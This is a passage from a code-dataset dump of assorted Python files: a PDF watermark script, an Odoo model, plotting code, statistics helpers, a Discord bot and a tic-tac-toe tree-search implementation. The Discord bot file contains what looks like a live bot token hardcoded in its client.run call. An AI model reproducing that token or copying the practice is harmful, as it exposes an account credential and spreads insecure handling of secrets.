"usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 1402, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 1403, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 1404, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 1405, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 1406, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 1407, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 1408, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 1413, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 1418, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 1419, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 1429, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 1437, "usage_type": "call"}, {"api_name": "django.urls.re_path", "line_number": 1442, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 1451, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 1456, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 1461, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 1462, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 1467, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 1472, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 1477, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 1482, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 1487, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 1492, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 1501, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 1511, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 1512, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 1513, "usage_type": "call"}, {"api_name": "wagtail.admin.panels.group.ObjectList", "line_number": 1529, "usage_type": "call"}, {"api_name": "wagtail.admin.panels.group.ObjectList", "line_number": 1534, "usage_type": "call"}, {"api_name": "wagtail.admin.panels.model_utils.extract_panel_definitions_from_model_class", "line_number": 1537, "usage_type": "call"}, {"api_name": "wagtail.admin.panels.group.ObjectList", "line_number": 1540, "usage_type": "call"}, {"api_name": "wagtail.admin.checks.check_panels_in_model", "line_number": 1548, "usage_type": "call"}, {"api_name": "django.core.checks.register", "line_number": 1550, "usage_type": "call"}, {"api_name": "django.core.checks", "line_number": 1550, "usage_type": "name"}, {"api_name": "wagtail.hooks.register", "line_number": 1554, "usage_type": "call"}, {"api_name": "wagtail.hooks", "line_number": 1554, "usage_type": "name"}, {"api_name": "wagtail.hooks.register", "line_number": 1556, "usage_type": "call"}, {"api_name": "wagtail.hooks", "line_number": 1556, "usage_type": "name"}, {"api_name": "wagtail.admin.viewsets.viewsets.register", "line_number": 1563, "usage_type": "call"}, {"api_name": "wagtail.admin.viewsets.viewsets", "line_number": 1563, "usage_type": "name"}, {"api_name": "wagtail.admin.menu.Menu", "line_number": 1641, "usage_type": "call"}, {"api_name": "wagtail.admin.menu.SubmenuMenuItem", "line_number": 1642, "usage_type": "call"}, {"api_name": "wagtail.hooks.register", "line_number": 1652, "usage_type": "call"}, {"api_name": "wagtail.hooks", "line_number": 1652, "usage_type": "name"}, {"api_name": "wagtail.hooks.register", "line_number": 1654, "usage_type": "call"}, {"api_name": "wagtail.hooks", "line_number": 1654, "usage_type": "name"}]} +{"seq_id": "594274601", "text": "import PyPDF2\n\n# create objects of pdf-s\ntemplete = PyPDF2.PdfFileReader(open('super.pdf', 'rb'))\nwatermark = PyPDF2.PdfFileReader(open('watermark.pdf', 'rb'))\n\noutput = PyPDF2.PdfFileWriter()\n\nfor i in range(templete.getNumPages()):\n # go thro all pages in templete\n page = templete.getPage(i)\n # merge two pages\n page.mergePage(watermark.getPage(0))\n # add page in memory so it can be saved later\n output.addPage(page)\n print(f'page {i} done')\n\nwith open('new_water_pdf.pdf', 'wb') as file:\n # save file form memory\n output.write(file)\nprint('All done!')\n", "sub_path": "watermark.py", "file_name": "watermark.py", "file_ext": "py", "file_size_in_byte": 584, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "PyPDF2.PdfFileReader", "line_number": 4, "usage_type": "call"}, {"api_name": "PyPDF2.PdfFileReader", "line_number": 5, "usage_type": "call"}, {"api_name": "PyPDF2.PdfFileWriter", "line_number": 7, "usage_type": "call"}]} +{"seq_id": "505447894", "text": "# -*- coding: utf-8 -*-\nimport logging\n_logger = logging.getLogger(__name__)\n\nfrom openerp import api, models, fields\nfrom openerp.exceptions import Warning\n\nclass AccountPaymentMode(models.Model):\n _inherit = 'account.payment.mode'\n _order = 'position'\n \n position = fields.Integer(\n string='Posicion'\n )", "sub_path": "ont_base_account/models/account_payment_mode.py", "file_name": "account_payment_mode.py", "file_ext": "py", "file_size_in_byte": 327, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "logging.getLogger", "line_number": 3, "usage_type": "call"}, {"api_name": "openerp.models.Model", "line_number": 8, "usage_type": "attribute"}, {"api_name": "openerp.models", "line_number": 8, "usage_type": "name"}, {"api_name": "openerp.fields.Integer", "line_number": 12, "usage_type": "call"}, {"api_name": "openerp.fields", "line_number": 12, "usage_type": "name"}]} +{"seq_id": "421972881", "text": "#! /usr/bin/env python\n# -*- coding: utf-8 -*-\nimport requests\nimport json\nimport re\n\ncontent_api = 'http://api.dev.kcis.cn/v1/nlp/Takecontent/getdata'\ntag_api = 'http://api.dev.kcis.cn/v1/nlp/baidu/tags'\nheaders = {'user-agent': 'Mozilla/5.0'}\n\n\ndef get_content(url):\n \"\"\"\n 根据 url 提取文章标题和内容\n \"\"\"\n r = requests.post(content_api, data={'linkurl': url})\n get_data = json.loads(r.text)\n if 'result' in get_data:\n get_data = get_data['result']\n title = get_data.get('Title')\n content = get_data.get('Content')\n if content:\n content = re.sub(r'<[^>]+>', '', content).strip()\n else:\n title, content = None, None\n return title, content\n\n\ndef get_tag(title, content):\n \"\"\"\n 根据文章标题和内容中提取相关标签,dict型\n \"\"\"\n r = requests.post(tag_api, data={'title': title, 'content': content})\n get_data = json.loads(r.text)\n tag_key = ['TOPIC', 'KEYWORDS', 'PER', 'LOC', 'ORG']\n tag_item = dict()\n if 'result' in get_data:\n get_data = get_data['result']\n for key in tag_key:\n if get_data.get(key):\n tag_item[key] = ','.join([str(i) for i in (get_data.get(key))])\n else:\n tag_item[key] = None\n else:\n for key in tag_key:\n tag_item[key] = None\n return tag_item\n", "sub_path": "newsctaly_byndapi.py", "file_name": "newsctaly_byndapi.py", "file_ext": "py", "file_size_in_byte": 1373, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "requests.post", "line_number": 16, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 17, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 23, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 33, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 34, "usage_type": "call"}]} +{"seq_id": "511317275", "text": "from dc3D import tworesolution_dual_contour\n\nimport numpy as np\nimport dcHelpers\n\nimport cPickle\n\n\ndef transform_dict(cellsDict):\n dataset = {}\n for key in cellsDict:\n dataset[key] = -1\n\n return dataset\n\n\nwfFile = open('Cantilever/Cells_01', 'rb')\ncellsDict = cPickle.load(wfFile)\nwfFile.close()\n\nwfFile = open('Cantilever/Dimensions_01', 'rb')\ndimensions = cPickle.load(wfFile)\nwfFile.close()\n\nres_fine = 1\nres_coarse = res_fine * 2.0\nresolutions = {'fine': res_fine,'coarse': res_coarse}\n\ndata = transform_dict(cellsDict)\n\n[verts_out_dc, quads_out_dc] = tworesolution_dual_contour(data, resolutions, dimensions)\n\ndcHelpers.export_as_stl(quads_out_dc, verts_out_dc, plot_scale = 'coarse', filename = 'canti.stl')\ndcHelpers.export_as_stl(quads_out_dc, verts_out_dc, plot_scale = 'fine', filename = 'canfi_fine.stl')\n\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom mpl_toolkits.mplot3d.art3d import Poly3DCollection, Line3DCollection\n\nfig = plt.figure()\nax = Axes3D(fig)\nax.set_aspect('equal')\n\nplot_scale = 'coarse'\nfor q in quads_out_dc[plot_scale]:\n vtx = verts_out_dc[plot_scale][q]\n x = vtx[:,0].tolist()\n y = vtx[:,1].tolist()\n z = vtx[:,2].tolist()\n vtx = [zip(x,y,z)]\n poly=Poly3DCollection(vtx)\n poly.set_color('r')\n poly.set_edgecolor('k')\n poly.set_alpha(.25)\n ax.add_collection3d(poly)\n\n''' # useful for debugging\nfor m_e_key, m_edge in manifold_edges_dc[plot_scale].items():\n vtx = verts_out_dc[plot_scale][[m_e_key[0],m_e_key[1]]]\n x = vtx[:, 0]\n y = vtx[:, 1]\n z = vtx[:, 2]\n vtx = [zip(x,y,z)]\n line = Line3DCollection(vtx,color='r',linewidth=1.0)\n ax.add_collection3d(line)\n\n for local_idx in range(2):\n if m_edge.v_kind[local_idx] == \"inside\":\n plotcolor = 'ro'\n elif m_edge.v_kind[local_idx] == \"outside\":\n plotcolor = 'gx'\n elif m_edge.v_kind[local_idx] == \"manifold\":\n plotcolor = 'k*'\n elif m_edge.v_kind[local_idx] == \"hybrid\":\n plotcolor = 'ks'\n else:\n print \"ERROR!\"\n vtx = verts_out_dc[plot_scale][m_e_key[local_idx]]\n ax.plot([vtx[0]],[vtx[1]],[vtx[2]],plotcolor)\n'''\n\nplot_scale = 'fine'\nfor q in quads_out_dc[plot_scale]:\n vtx = verts_out_dc[plot_scale][q]\n x = vtx[:,0].tolist()\n y = vtx[:,1].tolist()\n z = vtx[:,2].tolist()\n vtx = [zip(x,y,z)]\n poly=Poly3DCollection(vtx)\n poly.set_color('b')\n poly.set_edgecolor('k')\n poly.set_alpha(.25)\n ax.add_collection3d(poly)\n'''\nprint \"number of faces: \"+str(quads_out_dc[plot_scale].__len__())\nprint \"number of tri: \"+str(no_t)\nprint \"number of quads: \"+str(no_q)\nprint \"number of pents: \"+str(no_p)\nprint \"number of hex: \"+str(no_h)\nprint \"number of unex:\"+str(no_u)\n'''\nax.set_xlim3d(dimensions['xmin'], dimensions['xmax'])\nax.set_ylim3d(dimensions['ymin'], dimensions['ymax'])\nax.set_zlim3d(dimensions['zmin'], dimensions['zmax'])\nplt.show()\n\n\n", "sub_path": "Prototypes/PYTHON/Sandbox/DC_OOP/example_Cantilever.py", "file_name": "example_Cantilever.py", "file_ext": "py", "file_size_in_byte": 2953, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "cPickle.load", "line_number": 18, "usage_type": "call"}, {"api_name": "cPickle.load", "line_number": 22, "usage_type": "call"}, {"api_name": "dc3D.tworesolution_dual_contour", "line_number": 31, "usage_type": "call"}, {"api_name": "dcHelpers.export_as_stl", "line_number": 33, "usage_type": "call"}, {"api_name": "dcHelpers.export_as_stl", "line_number": 34, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 40, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 40, "usage_type": "name"}, {"api_name": "mpl_toolkits.mplot3d.Axes3D", "line_number": 41, "usage_type": "call"}, {"api_name": "mpl_toolkits.mplot3d.art3d.Poly3DCollection", "line_number": 51, "usage_type": "call"}, {"api_name": "mpl_toolkits.mplot3d.art3d.Poly3DCollection", "line_number": 89, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 105, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 105, "usage_type": "name"}]} +{"seq_id": "457894643", "text": "from typing import Tuple\r\nimport math\r\n\r\nfrom scratch.probability import normal_cdf, inverse_normal_cdf\r\n\r\n\r\n# %%\r\n\r\ndef normal_approximation_to_binomial(n: int, p: float) -> Tuple[float, float]:\r\n \"\"\"\r\n Returns mu and sigma corresponding to a Binomial(n, p)\r\n \"\"\"\r\n mu = p * n\r\n sigma = math.sqrt(p * (1 - p) * n)\r\n return mu, sigma\r\n\r\n\r\n# The normal cdf _is_ the probability the variable is below a threshold\r\nnormal_probability_below = normal_cdf\r\n\r\n\r\n# It's above the threshold if it's not below the threshold\r\ndef normal_probability_above(lo: float,\r\n mu: float = 0,\r\n sigma: float = 1) -> float:\r\n \"\"\"The probability that a N(mu, sigma) is greater than lo.\"\"\"\r\n return 1 - normal_cdf(lo, mu, sigma)\r\n\r\n\r\n# It's between if it's less than hi, but not less than lo.\r\ndef normal_probability_between(lo: float,\r\n hi: float,\r\n mu: float = 0,\r\n sigma: float = 1) -> float:\r\n \"\"\"The probability that a N(mu, sigma) is between lo and hi.\"\"\"\r\n return normal_cdf(hi, mu, sigma) - normal_cdf(lo, mu, sigma)\r\n\r\n\r\n# It's outside if it's not between\r\ndef normal_probability_outside(lo: float,\r\n hi: float,\r\n mu: float = 0,\r\n sigma: float = 1) -> float:\r\n \"\"\"The probability that a N(mu, sigma) is not between lo and hi.\"\"\"\r\n return 1 - normal_probability_between(lo, hi, mu, sigma)\r\n\r\n\r\ndef normal_upper_bound(probability: float,\r\n mu: float = 0,\r\n sigma: float = 1) -> float:\r\n \"\"\"Returns the z for which P(Z <= z) = probability\"\"\"\r\n return inverse_normal_cdf(probability, mu, sigma)\r\n\r\n\r\ndef normal_lower_bound(probability: float,\r\n mu: float = 0,\r\n sigma: float = 1) -> float:\r\n \"\"\"Returns the z for which P(Z >= z) = probability\"\"\"\r\n return inverse_normal_cdf(1 - probability, mu, sigma)\r\n\r\n\r\ndef normal_two_sided_bounds(probability: float,\r\n mu: float = 0,\r\n sigma: float = 1) -> Tuple[float, float]:\r\n \"\"\"\r\n Returns the symmetric (about the mean) bounds\r\n that contain the specified probability\r\n \"\"\"\r\n tail_probability = (1 - probability) / 2\r\n\r\n # upper bound should have tail_probability above it\r\n upper_bound = normal_lower_bound(tail_probability, mu, sigma)\r\n\r\n # lower bound should have tail_probability below it\r\n lower_bound = normal_upper_bound(tail_probability, mu, sigma)\r\n\r\n return lower_bound, upper_bound\r\n\r\n\r\n#%%\r\nmu_0, sigma_0 = normal_approximation_to_binomial(1000, 0.5)\r\nprint(mu_0)\r\nprint(sigma_0)\r\n#%%\r\nlower_bound, upper_bound = normal_two_sided_bounds(0.95, mu_0, sigma_0)\r\nprint(lower_bound)\r\nprint(upper_bound)\r\n#%%\r\nlo, hi = normal_two_sided_bounds(0.95, mu_0, sigma_0)\r\nprint(lo)\r\nprint(hi)\r\n#%%\r\nmu_1, sigma_1 = normal_approximation_to_binomial(1000, 0.55)\r\nprint(mu_1)\r\nprint(sigma_1)\r\n#%%\r\ntype_2_probability = normal_probability_between(lo, hi, mu_1, sigma_1)\r\npower = 1 - type_2_probability\r\nprint(power)\r\n#%%\r\nhi = normal_upper_bound(0.95, mu_0, sigma_0)\r\ntype_2_probability = normal_probability_below(hi, mu_1, sigma_1)\r\npower = 1 - type_2_probability # 0.936\r\nprint(hi)\r\nprint(power)\r\n#%%\r\n\r\n\r\ndef two_sided_p_value(x: float, mu: float = 0, sigma: float = 1) -> float:\r\n \"\"\"\r\n How likely are we to see a value at least as extreme as x (in either\r\n direction) if our values are from a N(mu, sigma)?\r\n \"\"\"\r\n if x >= mu:\r\n # x is greater than the mean, so the tail is everything greater than x\r\n return 2 * normal_probability_above(x, mu, sigma)\r\n else:\r\n # x is less than the mean, so the tail is everything less than x\r\n return 2 * normal_probability_below(x, mu, sigma)\r\n\r\n\r\ntwo_sided_p_value(529.5, mu_0, sigma_0) # 0.062\r\nprint(two_sided_p_value(529.5, mu_0, sigma_0))\r\n#%%\r\nimport random\r\n\r\nextreme_value_count = 0\r\nfor _ in range(1000):\r\n num_heads = sum(1 if random.random() < 0.5 else 0 # Count # of heads\r\n for _ in range(1000)) # in 1000 flips,\r\n if num_heads >= 530 or num_heads <= 470: # and count how often\r\n extreme_value_count += 1 # the # is 'extreme'\r\n\r\n# p-value was 0.062 => ~62 extreme values out of 1000\r\nprint(extreme_value_count)\r\n#%%\r\n", "sub_path": "infer.py", "file_name": "infer.py", "file_ext": "py", "file_size_in_byte": 4485, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "math.sqrt", "line_number": 14, "usage_type": "call"}, {"api_name": "typing.Tuple", "line_number": 9, "usage_type": "name"}, {"api_name": "scratch.probability.normal_cdf", "line_number": 19, "usage_type": "name"}, {"api_name": "scratch.probability.normal_cdf", "line_number": 27, "usage_type": "call"}, {"api_name": "scratch.probability.normal_cdf", "line_number": 36, "usage_type": "call"}, {"api_name": "scratch.probability.inverse_normal_cdf", "line_number": 52, "usage_type": "call"}, {"api_name": "scratch.probability.inverse_normal_cdf", "line_number": 59, "usage_type": "call"}, {"api_name": "typing.Tuple", "line_number": 64, "usage_type": "name"}, {"api_name": "random.random", "line_number": 129, "usage_type": "call"}]} +{"seq_id": "436241367", "text": "import discord\nimport random\nimport discord as disc\nfrom discord.ext import commands, tasks\nfrom discord.ext.commands import Bot\nimport secrets\nfrom time import sleep\n\n\nclient = commands.Bot(command_prefix=\".\")\nclient.remove_command(\"help\")\n\n\n@client.event\nasync def on_ready():\n await client.change_presence(status=discord.Status.idle, activity=discord.Game(\"Making me better!!!\"))\n print(\"Hello there! I am Evolution Wing bot at your service.\")\n\n\n@client.event\nasync def on_member_join(member):\n print(f\"{member} has joined. Welcome! I hope you will have fun. :)\")\n\n\n@client.event\nasync def on_member_remove(member):\n print(f\"{member} has left the server. Very sad :(\")\n\n\n@client.event\nasync def on_command_error(ctx, error):\n if isinstance(error, commands.MissingRequiredArgument):\n await ctx.send(\"Missing Argument.\\nPlease Enter All Required Arguments.\\n\")\n elif isinstance(error, commands.CommandNotFound):\n await ctx.send(\"Command Not Found.\\nType .help To See All The Existing Commands.\\n\")\n elif isinstance(error, commands.MissingPermissions):\n await ctx.send(\"Missing Permission.\\nYou Cannot Use This Command.\\n\")\n\n\n@client.command()\nasync def ping(ctx):\n await ctx.send(f\"(: Ping right now -> {round(client.latency * 1000)}ms <- Ping right now :)\")\n\n\n@client.command()\nasync def serverhelp(ctx):\n await ctx.send(\"Ping someone with admin perms for help.\")\n\n\n@client.command(aliases=['gm',\"morning\"])\nasync def goodmorning(ctx):\n await ctx.send(\"Good morning! Have a nice day.\")\n\n\n@client.command(aliases=['gn',\"night\"])\nasync def goodnight(ctx):\n await ctx.send(\"Good night! Sleep well.\")\n\n\n@client.command()\n@commands.has_permissions(manage_messages=True)\nasync def purge(ctx, amount=2):\n await ctx.channel.purge(limit=amount)\n\n\n@client.command()\n@commands.has_permissions(administrator=True)\nasync def kick(ctx, member : discord.Member, *, reason=None):\n await member.kick(reason=reason)\n\n\n@client.command(aliases=[\"flip\",'coinflip',\"Coin\",'Coinflip',\"Flip\"])\nasync def coin(ctx):\n options = [\"Head\", \"Tails\", 'Lost the coin! cannot verify the results. Try again']\n result = random.choice(options)\n await ctx.send(result)\n\n\n@client.command(aliases=[\"yo\",'hay',\"Yo\",'Hay',\"Hi\"], pass_context=True)\nasync def hi(ctx, member : discord.Member):\n await ctx.send(f\"Hay, {member.mention} What are you doing? \\nIs your day going nicely?\\n\")\n await client.delete_message(ctx.message)\n\n\n@client.command(aliases=[\"Bye\"])\nasync def bye(ctx):\n await ctx.send(\"sayonara\")\n\n\n@client.command(aliases=[\"Help\",'HELP'])\nasync def help(ctx):\n await ctx.send(\"\"\"Evolution Wing Official Discord Bot\n \"\"\")\n\n\nclient.run(\"NzYyOTU0NjU3OTM2ODM0NTYw.X3wq5Q.Br5mB_Qo8r1oX3lvJVRqmJLneQo\")", "sub_path": "botapp.py", "file_name": "botapp.py", "file_ext": "py", "file_size_in_byte": 2757, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "discord.ext.commands.Bot", "line_number": 10, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 10, "usage_type": "name"}, {"api_name": "discord.Status", "line_number": 16, "usage_type": "attribute"}, {"api_name": "discord.Game", "line_number": 16, "usage_type": "call"}, {"api_name": "discord.ext.commands.MissingRequiredArgument", "line_number": 32, "usage_type": "attribute"}, {"api_name": "discord.ext.commands", "line_number": 32, "usage_type": "name"}, {"api_name": "discord.ext.commands.CommandNotFound", "line_number": 34, "usage_type": "attribute"}, {"api_name": "discord.ext.commands", "line_number": 34, "usage_type": "name"}, {"api_name": "discord.ext.commands.MissingPermissions", "line_number": 36, "usage_type": "attribute"}, {"api_name": "discord.ext.commands", "line_number": 36, "usage_type": "name"}, {"api_name": "discord.ext.commands.has_permissions", "line_number": 61, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 61, "usage_type": "name"}, {"api_name": "discord.Member", "line_number": 68, "usage_type": "attribute"}, {"api_name": "discord.ext.commands.has_permissions", "line_number": 67, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 67, "usage_type": "name"}, {"api_name": "random.choice", "line_number": 75, "usage_type": "call"}, {"api_name": "discord.Member", "line_number": 80, "usage_type": "attribute"}]} +{"seq_id": "108631404", "text": "# MCTS using UCT\n\nimport numpy as np\nfrom collections import namedtuple\nimport tensorflow as tf\nfrom random import shuffle\nimport time\n\nGameStateTuple = namedtuple('GameStateTuple', ['board', 'turn_parity'])\n\nclass TurnParity:\n def __init__(self):\n self.sign = 1\n\n def flip(self):\n self.sign *= -1\n\n def __eq__(self, other):\n return self.sign == other\n\n def __repr__(self):\n return str(self.sign)\n\nclass TicTacToe:\n\n def __init__(self):\n self.state = GameStateTuple(\n board=np.zeros(dtype=np.int32, shape=(3,3)),\n turn_parity=TurnParity())\n\n self.episode_done = False\n\n def move_is_valid(self, move, player_id):\n if self.episode_done:\n return False\n\n if self.state.turn_parity != player_id:\n return False\n\n i = move[0]\n j = move[1]\n\n if self.state.board[i][j] != 0:\n return False\n\n return True\n\n def update_state(self, move, player_id):\n i = move[0]\n j = move[1]\n self.state.board[i][j] = player_id\n self.state.turn_parity.flip()\n\n def check_win(self):\n board = self.state.board\n\n columnar_victory = np.max(np.abs(np.sum(board, axis=0)) == 3)\n row_victory = np.max(np.abs(np.sum(board, axis=1)) == 3)\n forward_slash_victory = np.abs(board[2][0] + board[1][1] + board[0][2]) == 3\n back_slash_victory = np.abs(board[0][0] + board[1][1] + board[2][2]) == 3\n \n if columnar_victory or row_victory or forward_slash_victory or back_slash_victory:\n return True\n\n return False\n\n def check_full(self):\n board = self.state.board\n\n if np.sum(np.abs(board)) == 9:\n return True\n return False\n\n def step(self, move, player_id):\n '''\n Step the environment\n\n :param str move: tuple with row index and column index of a move\n :param str player_id: the ID of the player making the move, either -1 or 1\n :return: tuple with updated state, reward from perspective of player making the move, and indicator about whether game is over\n '''\n assert not self.episode_done\n assert self.move_is_valid(move, player_id)\n\n self.update_state(move, player_id)\n\n win = self.check_win()\n full = self.check_full()\n\n if win:\n reward = 1.0\n self.episode_done = True\n elif full and not win:\n reward = 0.0\n self.episode_done = True\n else:\n reward = 0.0\n\n return self.state, reward, self.episode_done\n\n def reset(self):\n '''\n Reset the environment\n '''\n self.state = GameStateTuple(\n board=np.zeros(dtype=np.int32, shape=(3,3)),\n turn_parity=TurnParity())\n\n self.episode_done = False\n\n def __repr__(self):\n if self.episode_done and self.check_win():\n line1 = str(-1 * self.state.turn_parity.sign) + ' has won.'\n elif self.episode_done:\n line1 = \"it's a tie.\"\n else:\n line1 = str(self.state.turn_parity) + ' to move:'\n\n line2 = str(self.state.board)\n return line1 + '\\n\\n' + line2\n\n def clone(self):\n clone_env = TicTacToe()\n\n board = np.zeros(dtype=np.int32, shape=(3,3))\n for i in range(0,3):\n for j in range(0,3):\n board[i][j] = self.state.board[i][j]\n\n turn_parity = TurnParity()\n\n if self.state.turn_parity == -1:\n turn_parity.flip()\n\n state = GameStateTuple(\n board=board,\n turn_parity=turn_parity)\n\n clone_env.state = state\n return clone_env\n\n\n\ngame = TicTacToe()\n\nprint(game)\ngame.step(move=(1,1), player_id=1)\ngame.step(move=(1,2), player_id=-1)\ngame.step(move=(0,0), player_id=1)\ngame.step(move=(0,2), player_id=-1)\ngame.step(move=(2,2), player_id=1)\nprint(game)\n\ngame.reset()\n\nprint(game)\ngame.step(move=(1,1), player_id=1)\ngame.step(move=(1,2), player_id=-1)\ngame.step(move=(0,0), player_id=1)\ngame.step(move=(0,2), player_id=-1)\ngame.step(move=(2,0), player_id=1)\ngame.step(move=(2,2), player_id=-1)\nprint(game)\n\n\ndef get_me_this_rotation(i):\n if i == 0:\n # identity\n forward = [[0,0], [0,1], [0,2], [1,0], [1,1], [1,2], [2,0], [2,1], [2,2]]\n backward = [[0,0], [0,1], [0,2], [1,0], [1,1], [1,2], [2,0], [2,1], [2,2]]\n elif i == 1:\n # rotate clockwise 90 degrees\n forward = [[2,0], [1,0], [0,0], [2,1], [1,1], [0,1], [2,2], [1,2], [0,2]]\n backward = [[0,2], [1,2], [2,2], [0,1], [1,1], [2,1], [0,0], [1,0], [2,0]]\n elif i == 2:\n # rotate clockwise 180 degrees\n forward = [[2,2], [2,1], [2,0], [1,2], [1,1], [1,0], [0,2], [0,1], [0,0]]\n backward = [[2,2], [2,1], [2,0], [1,2], [1,1], [1,0], [0,2], [0,1], [0,0]]\n elif i == 3:\n forward = [[0,2], [1,2], [2,2], [0,1], [1,1], [2,1], [0,0], [1,0], [2,0]]\n backward = [[2,0], [1,0], [0,0], [2,1], [1,1], [0,1], [2,2], [1,2], [0,2]]\n\n map_to_flat_idxs = lambda ij_pair: (3 * ij_pair[0] + ij_pair[1])\n\n forward = [map_to_flat_idxs(ij_pair) for ij_pair in forward]\n backward = [map_to_flat_idxs(ij_pair) for ij_pair in backward]\n\n return forward, backward\n\ndef get_me_this_reflection(i):\n if i == 0:\n # reflection around the axis 0 degrees clockwise from the vertical\n forward = [[0,2], [0,1], [0,0], [1,2], [1,1], [1,0], [2,2], [2,1], [2,0]]\n backward = [[0,2], [0,1], [0,0], [1,2], [1,1], [1,0], [2,2], [2,1], [2,0]]\n elif i == 1:\n # reflection around the axis 45 degrees clockwise from the vertical\n forward = [[2,2], [1,2], [0,2], [2,1], [1,1], [0,1], [2,0], [1,0], [0,0]]\n backward = [[2,2], [1,2], [0,2], [2,1], [1,1], [0,1], [2,0], [1,0], [0,0]]\n elif i == 2:\n # reflection around the axis 90 degrees clockwise from the vertical\n forward = [[2,0], [2,1], [2,2], [1,0], [1,1], [1,2], [0,0], [0,1], [0,2]]\n backward = [[2,0], [2,1], [2,2], [1,0], [1,1], [1,2], [0,0], [0,1], [0,2]]\n elif i == 3:\n # reflection around the axis 135 degrees clockwise from the vertical\n forward = [[0,0], [1,0], [2,0], [0,1], [1,1], [2,1], [0,2], [1,2], [2,2]]\n backward = [[0,0], [1,0], [2,0], [0,1], [1,1], [2,1], [0,2], [1,2], [2,2]]\n\n map_to_flat_idxs = lambda ij_pair: (3 * ij_pair[0] + ij_pair[1])\n\n forward = [map_to_flat_idxs(ij_pair) for ij_pair in forward]\n backward = [map_to_flat_idxs(ij_pair) for ij_pair in backward]\n\n return forward, backward\n\ndef get_me_a_random_transformation():\n i = np.random.randint(0,8)\n if i in range(0,4):\n forward, backward = get_me_this_reflection(i)\n else:\n i = i - 4\n forward, backward = get_me_this_rotation(i)\n\n return forward, backward\n\n\nclass Node:\n def __init__(self, s, parent_node_and_prev_action=None, is_root=False):\n # N, Q, P are vectors whose i-th coordinate corresponds to the i-th action that can be taken in state s.\n self.parent_node = None if parent_node_and_prev_action is None else parent_node_and_prev_action[0]\n self.prev_action = None if parent_node_and_prev_action is None else parent_node_and_prev_action[1]\n\n self.s = s.clone()\n self.Vs = None\n self.n = 1\n\n self.valid_actions_mask_vec = np.squeeze(np.reshape(self.get_valid_actions_mask(), [1, 9]), [0])\n self.Nas_vec = np.zeros(dtype=np.int32, shape=(9,))\n self.Was_vec = np.zeros(dtype=np.float32, shape=(9,))\n self.Qas_vec = np.zeros(dtype=np.float32, shape=(9,))\n self.Pas_vec = np.zeros(dtype=np.float32, shape=(9,))\n\n # hashtable of pointers to child nodes\n # the hashtable is keyed by integers, each representing the location of each possible move in a 1D representation of the board\n self.child_nodes = {i: None for i in range(0,9)}\n\n self.is_root = is_root\n\n def get_valid_actions_mask(self):\n if self.s.episode_done:\n return np.zeros(dtype=np.int32, shape=(3,3))\n\n bools_ = self.s.state.board == 0\n ints_ = np.array(bools_, dtype=np.int32)\n ints_ = np.reshape(ints_, [9])\n return ints_\n\n @property\n def is_leaf_node(self):\n return np.sum(self.Nas_vec) == 0 and not self.is_root\n\n @property\n def is_terminal_node(self):\n return self.s.episode_done\n\n @property\n def has_parent_node(self):\n return self.parent_node is not None\n\n def get_value_for_terminal_node(self):\n if self.is_terminal_node:\n # for terminal nodes, where game is actually over, use actual game outcome instead of neural network's value estimate\n\n env = self.s\n win = env.check_win()\n full = env.check_full()\n\n # for this implementation of tic tac toe, if terminal node involved a win, previous guy to move was the winner\n if win:\n v = -1.0\n elif full and not win:\n v = 0.0\n\n return v\n else:\n raise RuntimeError\n\n def predict_value_and_prior_vec_for_leaf_node(self, sess, f_theta):\n state = self.s.state\n state_repr = state.board * state.turn_parity.sign\n\n d_i, d_i_inverse = get_me_a_random_transformation()\n\n d_i_applied_to_state_repr = np.reshape(np.reshape(state_repr, [9])[d_i], [3,3])\n d_i_applied_to_valid_actions_mask_vec = self.valid_actions_mask_vec[d_i]\n\n state_repr_batch = np.expand_dims(d_i_applied_to_state_repr, 0)\n valid_actions_mask_batch = np.expand_dims(d_i_applied_to_valid_actions_mask_vec, 